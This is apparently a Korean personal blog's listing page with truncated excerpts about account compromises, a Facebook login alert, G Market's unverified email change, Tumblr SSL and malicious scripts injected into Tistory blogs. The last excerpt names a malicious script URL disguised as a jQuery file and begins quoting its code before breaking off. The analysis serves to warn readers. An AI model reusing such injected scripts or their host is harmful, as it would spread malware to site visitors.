어제 아침 충격적인 일이 있었다. 메일을 확인하려고 다음에 로그인을 하려는데 내가 약관을 위배해서 로그인이 차단됐다는 거다. 읽어보니 1월 7일에 다량의 스팸메일을 발송하였다고 한다. 너무 놀라서 허둥지둥 차단해제를 하고서 내가 보냈다는 메일을 확인해보니 정말 내 계정을 통해서 발송된 메일이었다. 더 충격적인 것은 smtp를 통해서 메일을 발송했다는거다. smtp의 인증은 id와 비밀번호다. 비밀번호를 누군가 알고 있다는거다! 다행히 다음 비밀번호는 예전에 쓰던 것이고 미처 바꾸지 못했던 거였다. 중요한 서비스에서 사용하는 비밀번호는 따로 관리하는데 이 비밀번호를 한번 쭉 변경하면서 변경 전 비밀번호를 아무곳에나 사용했던 것 같다. 다음은 이제 중요서비스가 아니게 된건가? 쩝. 어쨌든 중요한 것은 탈취당..

오랜만에 텀블러에 들어갔다. 텀블러에 요샌 글을 잘 안쓰지만 그래도 아주 좋아하는 서비스다. 배울 것도 많고. 여튼 들어가서 좋아하는 스킨 편집화면도 구경하고 뭐 달라진 건 없는지 살펴보는데 이상한게 눈에 띄었다. 작년인가 텀블러는 기본 접속을 https로 변경했다. 그러면서 이런 옵션을 제공했는데 두번째 문단은 처음본 것 같다. 가만히 보니 뭔가 이상하다. 내가 제대로 보고 있는 것이 맞나 싶었다. 보통 24시간 안에는 사용자 지정 도메인 사용 블로그에서도 SSL 기능이 활성화됩니다. 준비가 다 되면 이메일로 알려드려요. *.tumblr.com으로 접근하면 https를 기본으로 하겠다는 기능으로만 알고 있었는데 사용자 지정 도메인이라고? 사용자 지정 도메인? 내 도메인? joostory.net? 정말인..

오늘 갑자기 국외발신 문자로 문자 3개가 연달아왔다. 또 스팸인가부다 하고 무시하려고 했는데 페이스북이 보낸 문자인데다 잠시 후에 앱에서도 동일한 내용의 알림을 보내왔기 때문에 내용을 자세히 읽어봤다.누군가 새로운 기기 또는 브라우저에서 회원님의 Facebook 계정에 액세스하려고 했습니다. 계정을 안전하게 보호할 수 있도록 fb.com/--- 주소로 이동하여 이 내역에 대한 본인 여부를 확인해주세요.단순히 로그인 시도만으로 이런 문자와 알림을 보냈을리는 없으니 이는 분명 누군가가 내 페이스북 계정의 아이디와 비밀번호를 입력해서 로그인까지 성공했다는 이야기다. 최근에 중요한 계정들의 비밀번호를 바꾼터라 조금 놀랐다. 페이스북을 빼먹은 것 같다.페이스북의 로그인 보안장치문자의 링크를 클릭하니 이런 페이지로..

g마켓에서 이메일을 변경하려고 했다. 본인인증을 휴대폰으로 하란다. 이메일변경에 뭔 휴대폰 인증? 이상했지만 개인정보라서 그런가보다하고 귀찮지만 인증을 시도했다. 이 때만 해도 이메일이 개인정보이니 수정하기전에 한번 더 귀찮게 하려나보다라고 생각했다.이제 본인인증은 끝났고 G마켓에서 보내는 이메일 인증메일을 처리하려고 마음의 준비를 하고 있었다. 근데 놀라운 일이 일어났다. 이메일 변경이 끝났다고 한다.휴대전화번호 인증으로 메일주소 변경?뭐라고? 이 이메일이 제대로된 메일인지는 확인안해? 순간 내가 메일주소를 제대로 입력했는지 다시 한번 확인했다. 아니, 내가 오타라도 쳤으면 어쩌려고 이렇게 확인도 없이 바로 저장을 해버릴 수가 있지?당연히 자기 메일주소를 엉뚱하게 적을 사람은 없겠지. 그래도 최소한 수..

최근 티스토리 블로그 중 일부가 굉장히 로딩이 느렸는데 티스토리에서는 2가지로 이 원인을 파악하고 있다. (블로그 로딩이 느리다면 확인해보세요.) 하나는 먼저 글로 이야기 했지만 jquery의 cdn 속도 문제이고 또 하나는 악성 스크립트 삽입이다. cdn은 이미 이야기를 했으니 악성 스크립트에 대해서 이야기를 해보려고 한다. 악성 스크립트의 형태 여러가지 스크립트들을 발견했는데 그 중 하나인 http://www.global21.co.kr/js/jquery-2.1.0.min.js 를 살펴보려고 한다. 이유는 다른 스크립트들은 이런저런 이유로 이미 내 PC에서 접근이 안되기 때문이다. if(document.cookie.indexOf("bot_cnaver=")==-1) { var expires=new Dat..